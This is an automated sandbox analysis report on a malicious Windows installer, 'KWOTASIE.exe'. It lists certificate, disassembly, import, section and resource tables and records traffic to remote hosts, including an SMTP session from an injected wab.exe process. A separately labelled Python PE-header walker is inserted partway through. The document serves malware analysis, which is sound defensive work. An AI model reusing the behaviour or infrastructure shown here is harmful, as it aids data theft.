Signature Issuer: | E=Essentializing@Kriminalistiske.Jak, O=Indfjelse, OU="Sammenstuv Hoopla ", CN=Indfjelse, L=Achille, S=Oklahoma, C=US |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After | |
Subject Chain | |
Version: | 3 |
Thumbprint MD5: | 2C71F7B674852080C23D98B8870870C8 |
Thumbprint SHA-1: | 4241C59FE0A56B2B1005ED05A2A7841CA1FA8C36 |
Thumbprint SHA-256: | 23D182CC2442C7613AC110B685EB6FEA321A9A18288AD47BBCCE5D311E119308 |
Serial: | 34B5172AADDD4EDF8DF429F5A17EAE8BFEAC0FE8 |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+14h], ebx |
mov dword ptr [esp+10h], 0040A2E0h |
mov dword ptr [esp+1Ch], ebx |
call dword ptr [004080A8h] |
call dword ptr [004080A4h] |
and eax, BFFFFFFFh |
cmp ax, 00000006h |
mov dword ptr [0042A20Ch], eax |
je 00007F4C888BF493h |
push ebx |
call 00007F4C888C2729h |
cmp eax, ebx |
je 00007F4C888BF489h |
push 00000C00h |
call eax |
mov esi, 004082B0h |
push esi |
call 00007F4C888C26A3h |
push esi |
call dword ptr [00408150h] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], 00000000h |
jne 00007F4C888BF46Ch |
push 0000000Ah |
call 00007F4C888C26FCh |
push 00000008h |
call 00007F4C888C26F5h |
push 00000006h |
mov dword ptr [0042A204h], eax |
call 00007F4C888C26E9h |
cmp eax, ebx |
je 00007F4C888BF491h |
push 0000001Eh |
call eax |
test eax, eax |
je 00007F4C888BF489h |
or byte ptr [0042A20Fh], 00000040h |
push ebp |
call dword ptr [00408044h] |
push ebx |
call dword ptr [004082A0h] |
mov dword ptr [0042A2D8h], eax |
push ebx |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebx |
push 004216A8h |
call dword ptr [00408188h] |
push 0040A2C8h |
Programming Language: | |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x5bba8 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xee5f0 | 0x1868 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x626d | 0x6400 | b2dd5d917f94d75528a11411abe5681c | False | 0.6569921875 | data | 6.423132440637118 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x20318 | 0x600 | c46c24ddc9bf88a6774bd207204164b9 | False | 0.4921875 | data | 3.906531854842304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x2b000 | 0x35000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x60000 | 0x5bba8 | 0x5bc00 | e47ef02d4c8809b82823fbc6d27165c4 | False | 0.5386500553474114 | data | 6.341485897093692 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
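Added example, not part of the report: a stdlib-only PE32 header walker that reproduces the checks a reviewer applies to the data-directory and section tables above. It locates the section containing the entry point, reads IMAGE_DIRECTORY_ENTRY_SECURITY (whose first field is a file offset, not an RVA, unlike every other directory), tests whether the Authenticode blob ends exactly at end-of-file (for this sample 0xee5f0 + 0x1868 = 982616, the reported file size, so nothing was appended after signing), reads the WIN_CERTIFICATE type, measures any overlay between the last raw section and the signature, and lists sections with no raw data (.ndata here: 0x35000 virtual bytes, IMAGE_SCN_CNT_UNINITIALIZED_DATA, raw size 0). The image built by build_test_image() is a constructed fixture modelled on those tables, not the sample itself. The presence of a signature blob says nothing about its validity: the report marks this signature invalid because the chain terminates in a root the trust provider does not trust, and that verdict needs a real Authenticode verifier, not a header walk.

```python
"""Stdlib-only PE32 header walker (added example, not from the report).
The fixture in build_test_image() is constructed, not the analysed sample."""
import struct

SECURITY_DIR = 4                      # index of IMAGE_DIRECTORY_ENTRY_SECURITY
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x2  # wCertificateType for Authenticode PKCS#7


def parse_pe32(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> sections."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 image")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsections):
        off = opt + size_opt + 40 * i
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr,
                         "characteristics": struct.unpack_from("<I", data, off + 36)[0]})
    return {"entry_rva": entry_rva, "image_base": image_base, "dirs": dirs, "sections": sections}


def analyze(data: bytes) -> dict:
    """The checks a reviewer applies to the data-directory and section tables."""
    pe = parse_pe32(data)
    entry = pe["entry_rva"]
    entry_section = next((s["name"] for s in pe["sections"]
                          if s["va"] <= entry < s["va"] + max(s["vsize"], s["rawsize"])), None)
    # Unlike every other directory, the security entry stores a FILE offset, not an RVA.
    sig_off, sig_size = pe["dirs"][SECURITY_DIR] if len(pe["dirs"]) > SECURITY_DIR else (0, 0)
    signed = sig_size != 0
    cert_type = struct.unpack_from("<H", data, sig_off + 6)[0] if signed else None
    last_raw_end = max((s["rawptr"] + s["rawsize"] for s in pe["sections"] if s["rawsize"]), default=0)
    payload_end = sig_off if signed else len(data)
    return {
        "entry_va": pe["image_base"] + entry,
        "entry_section": entry_section,
        "signed": signed,
        # True when the Authenticode blob is the last thing in the file (nothing appended after signing)
        "signature_ends_at_eof": signed and sig_off + sig_size == len(data),
        "signature_is_pkcs7": cert_type == WIN_CERT_TYPE_PKCS_SIGNED_DATA,
        "overlay_bytes": max(payload_end - last_raw_end, 0),
        "zero_raw_sections": [s["name"] for s in pe["sections"] if s["rawsize"] == 0],
    }


def build_test_image() -> bytes:
    """Constructed PE32 fixture: .text holding the entry point, .ndata with a large
    virtual size but no raw data, and a placeholder WIN_CERTIFICATE appended at EOF."""
    secs = [(b".text", 0x626D, 0x1000, 0x200, 0x60000020),    # CODE | EXECUTE | READ
            (b".ndata", 0x35000, 0x2B000, 0x0, 0xC0000080)]   # UNINITIALIZED | READ | WRITE
    hdr_size = 0x400
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))                # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 16, 0x333D)                    # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                  # ImageBase
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    body, sec_hdrs = bytearray(), bytearray()
    for name, vsize, va, rawsize, chars in secs:
        ptr = hdr_size + len(body) if rawsize else 0
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize, ptr, 0, 0, 0, 0, chars)
        body += b"\x90" * rawsize
    sig = struct.pack("<IHH", 32, 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + b"\0" * 24
    struct.pack_into("<II", opt, 96 + 8 * SECURITY_DIR, hdr_size + len(body), len(sig))
    header = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(sec_hdrs)).ljust(hdr_size, b"\0")
    return header + bytes(body) + sig


if __name__ == "__main__":
    for key, value in analyze(build_test_image()).items():
        print(f"{key}: {value}")
```

Point `analyze()` at the bytes of a real binary to get the same fields the tables above print by hand; a non-zero `overlay_bytes` or a signature that does not end at EOF is where to look first for appended payloads or post-signing tampering, and `signature_is_pkcs7` only confirms the blob's declared type, not that the chain verifies.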
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x60328 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.4889265319407048 |
RT_ICON | 0xa2350 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.6356323198864309 |
RT_ICON | 0xb2b78 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.7203589985829003 |
RT_ICON | 0xb6da0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.7454356846473029 |
RT_ICON | 0xb9348 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.7938555347091932 |
RT_ICON | 0xba3f0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.8266393442622951 |
RT_ICON | 0xbad78 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.8714539007092199 |
RT_DIALOG | 0xbb1e0 | 0x140 | data | English | United States | 0.46875 |
RT_DIALOG | 0xbb320 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0xbb440 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0xbb508 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0xbb568 | 0x68 | data | English | United States | 0.7403846153846154 |
RT_VERSION | 0xbb5d0 | 0x294 | OpenPGP Secret Key | English | United States | 0.5106060606060606 |
RT_MANIFEST | 0xbb868 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384 |
DLL | Import |
---|---|
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW |
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 2, 2024 08:14:30.690773964 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:30.695559025 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:30.695627928 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:30.695817947 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:30.700532913 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656052113 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656068087 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656081915 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656094074 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656105995 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656116962 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656126976 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656137943 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656147957 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656160116 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.656188011 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.656258106 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.661001921 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.661052942 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.661065102 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.661098003 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.661101103 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.661139011 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.661218882 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.890189886 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890206099 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890299082 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890341997 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890353918 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890672922 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890675068 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.890690088 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890893936 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.890908957 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890950918 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.890963078 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.891087055 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.891103029 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.891122103 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.891982079 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892034054 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.892049074 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892059088 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892071009 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892081976 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892147064 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.892246008 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.892513037 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892613888 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892625093 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892661095 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892676115 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.892697096 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.893404961 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.893450975 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.893475056 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.893599033 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:31.895833015 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.895931005 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:31.899882078 CEST | 49714 | 80 | 192.168.2.5 | 102.218.215.35 |
Jul 2, 2024 08:14:32.127078056 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.127105951 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Jul 2, 2024 08:14:32.127116919 CEST | 80 | 49714 | 102.218.215.35 | 192.168.2.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 2, 2024 08:14:30.676949024 CEST | 53492 | 53 | 192.168.2.5 | 1.1.1.1 |
Jul 2, 2024 08:14:30.684187889 CEST | 53 | 53492 | 1.1.1.1 | 192.168.2.5 |
Jul 2, 2024 08:14:32.889214993 CEST | 49875 | 53 | 192.168.2.5 | 1.1.1.1 |
Jul 2, 2024 08:14:32.898752928 CEST | 53 | 49875 | 1.1.1.1 | 192.168.2.5 |
Jul 2, 2024 08:14:34.350888968 CEST | 58411 | 53 | 192.168.2.5 | 1.1.1.1 |
Jul 2, 2024 08:14:35.009377003 CEST | 53 | 58411 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jul 2, 2024 08:14:30.676949024 CEST | 192.168.2.5 | 1.1.1.1 | 0x6b75 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jul 2, 2024 08:14:32.889214993 CEST | 192.168.2.5 | 1.1.1.1 | 0x837f | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jul 2, 2024 08:14:34.350888968 CEST | 192.168.2.5 | 1.1.1.1 | 0x6752 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jul 2, 2024 08:14:30.684187889 CEST | 1.1.1.1 | 192.168.2.5 | 0x6b75 | No error (0) | | | 102.218.215.35 | A (IP address) | IN (0x0001) | false |
Jul 2, 2024 08:14:32.898752928 CEST | 1.1.1.1 | 192.168.2.5 | 0x837f | No error (0) | | | 208.95.112.1 | A (IP address) | IN (0x0001) | false |
Jul 2, 2024 08:14:35.009377003 CEST | 1.1.1.1 | 192.168.2.5 | 0x6752 | No error (0) | | | 102.130.125.173 | A (IP address) | IN (0x0001) | false |
Jul 2, 2024 08:14:57.280328989 CEST | 1.1.1.1 | 192.168.2.5 | 0x299d | No error (0) | | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
Jul 2, 2024 08:14:57.280328989 CEST | 1.1.1.1 | 192.168.2.5 | 0x299d | No error (0) | | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49714 | 102.218.215.35 | 80 | 5032 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 2, 2024 08:14:30.695817947 CEST | 166 | OUT | |
Jul 2, 2024 08:14:31.656052113 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656068087 CEST | 224 | IN | |
Jul 2, 2024 08:14:31.656081915 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656094074 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656105995 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656116962 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656126976 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656137943 CEST | 552 | IN | |
Jul 2, 2024 08:14:31.656147957 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.656160116 CEST | 1236 | IN | |
Jul 2, 2024 08:14:31.661001921 CEST | 1236 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.5 | 49715 | 208.95.112.1 | 80 | 5032 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Jul 2, 2024 08:14:32.909986973 CEST | 80 | OUT | |
Jul 2, 2024 08:14:33.396244049 CEST | 175 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Jul 2, 2024 08:14:37.937992096 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 | 220-vps5.ncwsa.co.za ESMTP Exim 4.96.2 #2 Tue, 02 Jul 2024 08:14:37 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. |
Jul 2, 2024 08:14:37.938404083 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 | EHLO 887849 |
Jul 2, 2024 08:14:38.270381927 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 | 250-vps5.ncwsa.co.za Hello 887849 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP |
Jul 2, 2024 08:14:38.270672083 CEST | 49717 | 587 | 192.168.2.5 | 102.130.125.173 | STARTTLS |
Jul 2, 2024 08:14:38.604161978 CEST | 587 | 49717 | 102.130.125.173 | 192.168.2.5 | 220 TLS go ahead |
Target ID: | 0 |
Start time: | 02:13:35 |
Start date: | 02/07/2024 |
Path: | C:\Users\user\Desktop\KWOTASIE.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 982'616 bytes |
MD5 hash: | ECBEC21DCFA39A1131D2A79ACDF73F88 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 02:13:36 |
Start date: | 02/07/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x300000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 02:13:36 |
Start date: | 02/07/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 02:14:21 |
Start date: | 02/07/2024 |
Path: | C:\Program Files (x86)\Windows Mail\wab.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xcc0000 |
File size: | 516'608 bytes |
MD5 hash: | 251E51E2FEDCE8BB82763D39D631EF89 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 23.9% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 20.8% |
Total number of Nodes: | 1348 |
Total number of Limit Nodes: | 36 |
Function | Relevance | APIs | Strings | Instructions | Tags |
---|---|---|---|---|---|
0040333D | 91.4 | 34 | 18 | 412 | string, file, com, COMMON |
004053EF | 68.5 | 36 | 3 | 284 | window, clipboard, memory, COMMON |
0040595A | 19.4 | 7 | 4 | 148 | file, string, COMMON |
00406956 | 5.4 | 4 | - | 382 | COMMON |
00403D08 | 59.8 | 32 | 2 | 346 | window, string, COMMON |
0040395A | 47.5 | 13 | 14 | 215 | string, registry, COMMON |
0040626E | 19.5 | 7 | 4 | 209 | string, COMMON |
0040176F | 15.9 | 5 | 4 | 145 | string, time, COMMON |
004052B0 | 14.1 | 7 | 1 | 72 | string, window, COMMON |
004065B6 | 10.5 | 3 | 3 | 36 | library, COMMON |
004023DE | 7.1 | 3 | 1 | 64 | registry, string, COMMON |
00405C25 | 5.3 | 2 | 1 | 47 | string, COMMON |
